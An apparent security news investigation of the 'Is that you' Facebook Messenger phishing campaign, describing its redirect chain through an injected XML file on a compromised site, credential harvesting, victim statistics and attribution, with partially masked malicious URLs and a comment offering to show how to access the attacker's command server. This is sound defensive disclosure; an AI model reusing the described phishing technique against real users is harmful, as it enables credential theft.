We uncovered a Facebook phishing campaign that tricked nearly 500,000 users in two weeks


Our investigation into a malicious Facebook Messenger message uncovered a large-scale phishing operation on Facebook. We also potentially identified the threat actor behind the phishing campaign and his intentions.

“Is that you” is a phishing scam circulating on Facebook in various forms since at least 2017. It begins with a Facebook message sent by one of your friends. The “friend” claims to have found a video or image with you featured in it.

The message masquerades as a video that, when clicked, leads you through a chain of websites infected with malicious scripts.

ADVERTISEMENT

These scripts determine your location, the device you are using, and your operating system. They then lead you to a malicious Facebook phishing page in order to harvest your credentials, and, depending on your device, infect it with adware or other malware.

Close to 500,000 victims

At the time of writing this report on February 8, the number of potential victims exceeded 480,000 since the phishing campaign began on January 26, 2020, with 77% of the victims being based in Germany.

Based on the large-scale nature of the campaign and the fact that it appears to predominantly target users in Germany, we shared our report with CERT Germany, Facebook, and wal.ee (the URL shortener service used by the threat actor). We also informed the Dominican Republic’s cyber police about the incident.

That being said, it wasn’t immediately clear whether the threat actor behind the phishing operation was using the compromised Facebook accounts for any malicious purpose other than to simply spread the phishing campaign through the victims’ Messenger contacts.

Interestingly, however, the threat actor was using a legitimate third-party web statistics service to track the campaign, which helped us conduct our investigation and find out the start date of the campaign, the number of affected users, and more useful information.

Cybernews pro tip

Every week, thousands of social media accounts are compromised and stolen by phishers. A quality password manager will help you keep your online accounts secure.

Protect your data now with a top password manager.
ADVERTISEMENT

How the phishing campaign works

The message

The campaign is initiated by sending the potential victim a message from one of their Facebook contacts. The message contains what appears to be a video link with a suggestive text that asks the victim ‘Is that you?’ in German. It seems that the message employs Facebook’s Open Graph protocol to manipulate the fake video preview to include the recipient's name.

After clicking the malicious link, the victim is redirected to a fake Facebook phishing page.

The “legitimate” phishing page

Interestingly, the malicious script that redirects victim to the phishing page is hidden in what appears to be a compromised legitimate website.

http://108xxxxxxx.rsc.cdn77.org/Uploaded/Content/26d0ba85d866423db3d591c9835d72ef/saliendopadentro.xml

The website appears to be legitimate. However, a malicious XML file has been injected into its code.

ADVERTISEMENT

The file has a small script that triggers a redirect to a short URL, which then leads the victim to a malicious phishing page. Using a legitimate website to host malicious redirect scripts makes the phishing attack more effective as it can be used to bypass Facebook’s blacklists.

How we uncovered the threat actor behind the campaign

As we investigated the phishing page, we learned that it includes HTML content with Open Graph metadata and obfuscated images with Base64 encoding.

To our surprise, we found that the malicious script was signed by the author. Translated from Spanish, the author’s signature means:

Developed by
BenderCrack.com

The domain mentioned in the signature no longer exists. However, upon further investigation, we discovered a Facebook page that could be connected to the creator of the malicious script:

ADVERTISEMENT

Meanwhile, the original phishing page also includes a script designed to harvest credentials entered by the victims and collect their location data:

script designed to harvest credentials

The malicious scripts are hosted on the threat actor’s private server:

https://lapirixxx.xyz

We also discovered legitimate third-party service-tracking code implanted in the phishing page.

After obtaining the identifier, we were able to access the threat actor’s dashboard to determine the scale of the campaign.

It appears that since the start of the malicious campaign, a total of more than 480,000 users have ended up clicking the phishing link. Since we had access to the threat actor’s dashboard, we were able to identify the devices and browsers predominantly used by the affected users.

diagram Facebook phishing most affected os
ADVERTISEMENT
Facebook phishing most affected browsers diagram

We were able to identify and correlate other, potentially malicious activities that we traced to the same threat actor.

The Facebook phishing campaign is named Tamo Trabajando, which means “we’re working.”

The motive

Even though Facebook has a rigorous system of checks to stop the spread of malware and malicious links, these types of campaigns are sophisticated enough to at least temporarily bypass those measures.

It’s clear that the “Is that you” phishing campaign was targeting German residents in order to harvest their credentials. What was not immediately clear, however, is whether the mass abuse of breached Facebook accounts was perpetrated in order to do anything else besides spreading the campaign.

What could point to the threat actor’s further motives, however, is the fact that after having their credentials harvested, the victim was redirected to a malicious website that served them either adware or malware.

The threat actor’s other campaign - Blacksar Inc. - appears to be associated with additional malicious websites and malware campaigns. We have observed more Spanish words in the code, such as saliendopadentro, Desarrollado por etc.

ADVERTISEMENT

One of the malicious Blacksar domains was registered from the Dominican Republic, which strongly suggests that the threat actor is from a Spanish-speaking country or even the Dominican Republic itself.

register

One interesting campaign and tracking code was LA PARITA, which tracked a particular personal Facebook profile and its visitors. That person seemed to be based in the Dominican Republic.

At this point, we have sent our report, our open-source intelligence, and all the remaining details we gathered during our analysis to the Computer Emergency Response Teams (CERTs) in Germany and the Dominican Republic.

Steps we’ve taken to mitigate the threat

  • We have reported the phishing campaign with the relevant information to Facebook to help stop the spread of the campaign on the social media platform.
  • We have informed the wal.ee link shortening service to disable the short URL that redirects to the malicious Facebook phishing page. At the time of publishing they have removed the malicious script from their website.
  • We have sent all the relevant information and evidence from our investigation to CERT Germany since it is evident that the campaign primarily targets German citizens.
  • We have sent the relevant information to Dominican CERT, as some artefacts and evidence point that the campaign was launched from there.
  • We have informed the website compromised by the threat actor that it serves malicious scripts.

How to protect yourself against phishers

  • Use unique and complex passwords for all of your online accounts. Password managers help you easily create strong passwords and notify you of password reuse.
  • Use multi-factor authentication where possible.
  • Beware of any messages sent to you, even from your contacts. Phishing attacks usually employ some type of social engineering to lure users into clicking malicious links or downloading infected files.
  • Be mindful of any suspicious activity on your Facebook or other accounts.

Build your secure personal and business online presence


ADVERTISEMENT

Comments

John
prefix 3 years ago
I saw this back in October 2020 – this is just another variant of the same phishing scam.
Mantas Sasnauskas
prefix 3 years ago
Hi John. Correct, as mentioned in the article, it is just one of the many variants. And you are correct, we can see that the scam started around October 2020. We are continuing to investigate the whole scam with more details and how widespread it is. We will have an update on it in due time.
Toto
prefix 3 years ago
Interesting, but why is it not advised that users check the url of a website demanding credentials?
If a page claiming to be Facebook has an url like whatever.com, isn’t it easy to notice it and know that something is wrong?
Aidan Raney
prefix 3 years ago
I actually investigated this same campaign a few months ago after a friend got hacked from it. I have some additional information and I spoke with the creator of the tool they use as well. I gained access to one of their command and control servers while researching it and I can show you how to do this for your own research. Please contact me so I can send these details.
Mantas Sasnauskas
prefix 3 years ago
Hi Aidan. Thank you for commenting. That is very interesting, I’ve emailed you.
John Doe
prefix 3 years ago
Spanish words are misspelled this might be a spoof account I don’t think the Dominican republic can afford The level of sophistication.
Mantas Sasnauskas
prefix 3 years ago
Yes, Spanish words do not necessarily prove anything, but with all the other artefacts we managed to find, they do point that way.
Leave a Reply

Your email address will not be published. Required fields are markedmarked